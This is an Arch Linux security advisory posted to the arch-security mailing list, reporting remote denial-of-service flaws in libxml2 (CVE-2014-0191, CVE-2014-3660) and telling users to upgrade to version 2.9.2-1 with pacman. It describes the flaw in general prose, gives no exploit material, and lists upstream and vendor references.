[arch-security] [Arch Linux Security Advisory ASA-201410-12] libxml2: Denial of service

Levente Polyak anthraxx at archlinux.org
Fri Oct 24 22:15:08 UTC 2014


Arch Linux Security Advisory ASA-201410-12
==========================================

Severity: Medium
Date    : 2014-10-24
CVE-ID  : CVE-2014-0191, CVE-2014-3660
Package : libxml2
Type    : Denial of service
Remote  : Yes
Link    : https://wiki.archlinux.org/index.php/CVE-2014

Summary
=======

The package libxml2 before version 2.9.2-1 is vulnerable to denial of
service, even if entity substitution is disabled.

Resolution
==========

Upgrade to 2.9.2-1.

# pacman -Syu "libxml2>=2.9.2-1"

The problems have been fixed upstream [0][1] in version 2.9.2.

Workaround
==========

None.

Description
===========

Daniel Berrange discovered that libxml2 incorrectly performs entity
substitution in the doctype prolog, even if the application using
libxml2 disabled any entity substitution. A remote attacker could
provide a specially crafted XML file that, when processed, leads to the
exhaustion of CPU and memory resources or file descriptors.

Impact
======

A remote attacker is able to exploit this vulnerability using a
specially crafted XML document containing malicious attributes to
consume all available CPU and memory resources or file descriptors.

References
==========

[0] https://git.gnome.org/browse/libxml2/commit/?id=9cd1c
[1] https://git.gnome.org/browse/libxml2/commit/?id=be2a7
https://access.redhat.com/security/cve/CVE-2014-0191
https://access.redhat.com/security/cve/CVE-2014-3660
https://bugs.archlinux.org/task/40790
http://www.openwall.com/lists/oss-security/2014/05/06/4


-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 819 bytes
Desc: OpenPGP digital signature
URL: <https://lists.archlinux.org/pipermail/arch-security/attachments/20141025/cdd1dd4c/attachment.bin>


More information about the arch-security mailing list